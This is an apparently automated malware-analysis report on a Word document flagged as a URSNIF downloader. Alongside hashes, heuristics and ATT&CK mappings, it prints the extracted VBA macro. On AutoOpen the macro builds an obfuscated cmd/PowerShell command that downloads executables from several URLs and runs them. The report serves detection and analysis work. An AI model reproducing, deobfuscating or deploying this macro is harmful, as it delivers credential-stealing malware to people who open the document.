Office (OLE) malware analysis — malicious · a32aa4a61cd6dbe7

MALICIOUS

Office (OLE)

71.1 KB Created: 2018-09-04 23:11:00 Authoring application: Microsoft Office Word First seen: 2018-10-07

MD5: bbd1209cf85297e7a3e93885aaa63a14 SHA-1: ebbb5c845866dffd136ec30a284858c7d7defad3 SHA-256: a32aa4a61cd6dbe715fc55bbbe13f99835855ea453d5cf50ff00cd2dd6b886aa

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function, indicating an attempt to execute arbitrary commands. The ClamAV heuristic identifies it as a downloader, suggesting it is designed to fetch and execute additional malicious content. The specific macro name 'macros.bas' and the ClamAV detection name are included as IOCs.

Heuristics 6

ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4765 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4765 bytes
SHA-256: `d0e72aee9592f7fb0bfe84caa7efc61997454ac6e73a4342ba49dcc18d1ad89e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "YzwwqHZAsAqRqM" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On _ Error _ Resume _ Next Hour "uXNt" + "O" + "zDFQOzl" + "495743396" Hour "5784" + "pPzLiBLiPq" + "5046" + "Bwa" VBA.Shell CleanString(q) + lokTfdTfMj + PzJBcjmdbpzI + ZJGHoXrq + KBGYqFndVa + kdnAUcPfzD + zidblLqCzHKD + ljNTcTBPp, 94 - 94 Hour "pDczvoc" + "vjoBkuPuNzCq" Hour "9168" + "360342317" End Sub Attribute VB_Name = "rrcjfJjhot" Function ZJGHoXrq() On _ Error _ Resume _ Next Hour "cK" + "HQmQ" Hour "461345707" + "isCJ" Hour "172709412" + "2359" Hour "ovPRkrWNMhhdSV" + "T" KHroFR = "cm" + "d /V^" + ":" + "^ON/" + "C" + Chr(5 + 2 + 1 + 1 + 25) + "^s" + "^et ^X^" + "Bk=" + "^ " + "^ " + "^ ^ " + "^ " + " ^ ^" Hour "iUti" + "UiXZcwbLT" Hour "7751" + "QMfB" + "2318" + "iLiABwRZb" Hour "IFQHFSshtlkboA" + "7261" Hour "ZIDvY" + "174855443" mRiKfonYI = " }^" + "}^{^hct" + "ac};k" + "^a^er" + "b^;" + "KVr^$^" + " m^e" + "^" + "t^I-" + "ekovnI;" Hour "1255" + "zwcX" + "CuET" + "ssaGwiIjfX" Hour "9511" + "IYbihTnbti" Hour "QVaFmLc" + "533958705" + "mzzI" + "dd" fUapSz = ")" + "KVr^$" + " ^,GDj" + "^$(e^l" + "iFdaol" + "n^wo^D^" + ".r" + "^i^" + "T^${yr^" Hour "w" + "9741" + "31391365" + "TfB" Hour "XDw" + "Y" Hour "EpRNv" + "3687" Ydznp = "t" + "^{)p" + "N^H^" + "$ n^i " + "G^" + "D^j^" Hour "1192" + "DiD" Hour "cMs" + "396258114" + "a" + "t" Hour "9254" + "LMiJ" Hour "BKhE" + "185935812" + "ss" + "101710257" iWLdvnrX = "$(hc" + "aer^o" + "f^;'^" + "e^xe^.'" + "^+H^" + "hz" + "$+^'\'^" + "+ci^lb" + "^" + "up:vn^e" + "$" Hour "z" + "qrzknG" + "ruQsGbBt" + "UMIAbKmickivE" Hour "9287" + "KTnoblQV" + "4354" + "106" Hour "124548320" + "333359069" Hour "Kq" + "Mk" + "v" + "haJPPw" DRSQzzimQ = "=^KVr" + "$" + "^;^'^8" + "^" + "0^1' = " + "Hhz" + "^$;)'^@" + "'(" + "t^i^" + "l^p" + "^S.'^L" + "x^f/^m" + "^o" Hour "kiALZDL" + "sHfm" + "zHVUdTtw" + "385526031" XzZNnlX = "c.^s" + "^" + "e" + "ige^t^a" + "r^ts" + "dn" + "i" + "mn" + "^ir" + "a^" + "e^b//^:" + "^" + "p^t^th@" Hour "403741703" + "492857809" + "rXtj" + "JwfiCHrBlbajL" Hour "T" + "1392" + "CXv" + "3517" Hour "nizvrR" + "n" + "43" + "FCW" Hour "I" + "57974092" BiBfjkh = "U" + "H" + "b^3^I" + "jB" + "/puorg." + "not^s" + "r^i^f//" + ":ptth" + "@^" + "t" + "N^wB^" + "JNuu/m" Hour "370099275" + "viqzwdi" Hour "Qw" + "DtUmhN" Hour "450814384" + "65239248" + "287449246" + "2607" Hour "463964986" + "k" + "235848379" + "liKwTWiz" Hour "rcII" + "c" qWFnFNz = "^" + "o" + "c.cet" + "^a^b" + "^me^o^" + "pu" + "r^g//" + "^:^pt^t" + "h^@" + "a^x" ZJGHoXrq = KHroFR + mRiKfonYI + fUapSz + Ydznp + iWLdvnrX + DRSQzzimQ + XzZNnlX + BiBfjkh + qWFnFNz Hour "kq" + "C" + "Ch" + "tK" Hour "417293346" + "Sw" Hour "FCnOufME" + "mGXF" End Function Function KBGYqFndVa() On _ Error _ Resume _ Next Hour "NU" + "iOpBaDAsNGHs" + "403167801" + "OQRYhS" Hour "RXRAaphq" + "kjTE" + "515265240" + "cvFNn" Hour "N" + "H" Hour "zwkh" + "tNiLoCiSo" + "3752" + "50989739" jnQoPUS = "8S1" + "/r" + "^" + "t^." + "m^oc.tn" + "^o^k^o" + "^teb//^" + ":^p" + "t^t^h@^" + "T/moc^." + "haru^mr" Hour "BzYE" + "15224881" Hour "QCW" + "ov" + "tJCf" + "7595" Hour "384" + "LKwd" + "mjzZstzGzKzK" + "7842" jSaBtlHao = "^" + "od" + "n^ev//^" + ":^pt" + "t^" + "h'=" + "^" + "pN^H$;^" + "tn^e" + "ilC" + "b" + "^e^W" + "." Hour "JPj" + "7692" + "9301" + "108746628" Hour "9945" + "479719177" JcnvrCPHiju = "^t^" + "e" + "N^ t" + "ce^j^" + "bo^-^" + "w" + "en" + "^=" + "riT^" + "$ ^l^l" + "^e^h^" Hour "424814229" + "kMrlwCE" + "uirNPjrjr" + "zLJjOiRG" Hour "HSHb" + "3716" + "ofuVnFz" + "119133833" XRzdVQw = "sr^e" + "^" + "wo^p&" + "&^f^o" + "r" + " /^L " + "%^2 ^i" + "n " + "(3^6^" Hour "l" + "QCjP" Hour "PaFCpdwYvSw" + "KYdjJY" ... (truncated)

SHA-256: d0e72aee9592f7fb0bfe84caa7efc61997454ac6e73a4342ba49dcc18d1ad89e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "YzwwqHZAsAqRqM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
   Hour "uXNt" + "O" + "zDFQOzl" + "495743396"
   Hour "5784" + "pPzLiBLiPq" + "5046" + "Bwa"
VBA.Shell CleanString(q) + lokTfdTfMj + PzJBcjmdbpzI + ZJGHoXrq + KBGYqFndVa + kdnAUcPfzD + zidblLqCzHKD + ljNTcTBPp, 94 - 94
   Hour "pDczvoc" + "vjoBkuPuNzCq"
   Hour "9168" + "360342317"
End Sub



Attribute VB_Name = "rrcjfJjhot"
Function ZJGHoXrq()

On _
Error _
Resume _
Next
Hour "cK" + "HQmQ"
   Hour "461345707" + "isCJ"
   Hour "172709412" + "2359"
   Hour "ovPRkrWNMhhdSV" + "T"
KHroFR = "cm" + "d /V^" + ":" + "^ON/" + "C" + Chr(5 + 2 + 1 + 1 + 25) + "^s" + "^et ^X^" + "Bk=" + "^  " + "^  " + "^   ^ " + "^   " + " ^  ^"
Hour "iUti" + "UiXZcwbLT"
   Hour "7751" + "QMfB" + "2318" + "iLiABwRZb"
   Hour "IFQHFSshtlkboA" + "7261"
   Hour "ZIDvY" + "174855443"
mRiKfonYI = "   }^" + "}^{^hct" + "ac};k" + "^a^er" + "b^;" + "KVr^$^" + " m^e" + "^" + "t^I-" + "ekovnI;"
Hour "1255" + "zwcX" + "CuET" + "ssaGwiIjfX"
   Hour "9511" + "IYbihTnbti"
   Hour "QVaFmLc" + "533958705" + "mzzI" + "dd"
fUapSz = ")" + "KVr^$" + " ^,GDj" + "^$(e^l" + "iFdaol" + "n^wo^D^" + ".r" + "^i^" + "T^${yr^"
Hour "w" + "9741" + "31391365" + "TfB"
   Hour "XDw" + "Y"
   Hour "EpRNv" + "3687"
Ydznp = "t" + "^{)p" + "N^H^" + "$ n^i " + "G^" + "D^j^"
Hour "1192" + "DiD"
   Hour "cMs" + "396258114" + "a" + "t"
   Hour "9254" + "LMiJ"
   Hour "BKhE" + "185935812" + "ss" + "101710257"
iWLdvnrX = "$(hc" + "aer^o" + "f^;'^" + "e^xe^.'" + "^+H^" + "hz" + "$+^'\'^" + "+ci^lb" + "^" + "up:vn^e" + "$"
Hour "z" + "qrzknG" + "ruQsGbBt" + "UMIAbKmickivE"
   Hour "9287" + "KTnoblQV" + "4354" + "106"
   Hour "124548320" + "333359069"
   Hour "Kq" + "Mk" + "v" + "haJPPw"
DRSQzzimQ = "=^KVr" + "$" + "^;^'^8" + "^" + "0^1' = " + "Hhz" + "^$;)'^@" + "'(" + "t^i^" + "l^p" + "^S.'^L" + "x^f/^m" + "^o"
Hour "kiALZDL" + "sHfm" + "zHVUdTtw" + "385526031"
XzZNnlX = "c.^s" + "^" + "e" + "ige^t^a" + "r^ts" + "dn" + "i" + "mn" + "^ir" + "a^" + "e^b//^:" + "^" + "p^t^th@"
Hour "403741703" + "492857809" + "rXtj" + "JwfiCHrBlbajL"
   Hour "T" + "1392" + "CXv" + "3517"
   Hour "nizvrR" + "n" + "43" + "FCW"
   Hour "I" + "57974092"
BiBfjkh = "U" + "H" + "b^3^I" + "jB" + "/puorg." + "not^s" + "r^i^f//" + ":ptth" + "@^" + "t" + "N^wB^" + "JNuu/m"
Hour "370099275" + "viqzwdi"
   Hour "Qw" + "DtUmhN"
   Hour "450814384" + "65239248" + "287449246" + "2607"
   Hour "463964986" + "k" + "235848379" + "liKwTWiz"
   Hour "rcII" + "c"
qWFnFNz = "^" + "o" + "c.cet" + "^a^b" + "^me^o^" + "pu" + "r^g//" + "^:^pt^t" + "h^@" + "a^x"
ZJGHoXrq = KHroFR + mRiKfonYI + fUapSz + Ydznp + iWLdvnrX + DRSQzzimQ + XzZNnlX + BiBfjkh + qWFnFNz
   Hour "kq" + "C" + "Ch" + "tK"
   Hour "417293346" + "Sw"
   Hour "FCnOufME" + "mGXF"
End Function
Function KBGYqFndVa()

On _
Error _
Resume _
Next
Hour "NU" + "iOpBaDAsNGHs" + "403167801" + "OQRYhS"
   Hour "RXRAaphq" + "kjTE" + "515265240" + "cvFNn"
   Hour "N" + "H"
   Hour "zwkh" + "tNiLoCiSo" + "3752" + "50989739"
jnQoPUS = "8S1" + "/r" + "^" + "t^." + "m^oc.tn" + "^o^k^o" + "^teb//^" + ":^p" + "t^t^h@^" + "T/moc^." + "haru^mr"
Hour "BzYE" + "15224881"
   Hour "QCW" + "ov" + "tJCf" + "7595"
   Hour "384" + "LKwd" + "mjzZstzGzKzK" + "7842"
jSaBtlHao = "^" + "od" + "n^ev//^" + ":^pt" + "t^" + "h'=" + "^" + "pN^H$;^" + "tn^e" + "ilC" + "b" + "^e^W" + "."
Hour "JPj" + "7692" + "9301" + "108746628"
   Hour "9945" + "479719177"
JcnvrCPHiju = "^t^" + "e" + "N^ t" + "ce^j^" + "bo^-^" + "w" + "en" + "^=" + "riT^" + "$ ^l^l" + "^e^h^"
Hour "424814229" + "kMrlwCE" + "uirNPjrjr" + "zLJjOiRG"
   Hour "HSHb" + "3716" + "ofuVnFz" + "119133833"
XRzdVQw = "sr^e" + "^" + "wo^p&" + "&^f^o" + "r" + " /^L " + "%^2 ^i" + "n " + "(3^6^"
Hour "l" + "QCjP"
   Hour "PaFCpdwYvSw" + "KYdjJY"
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.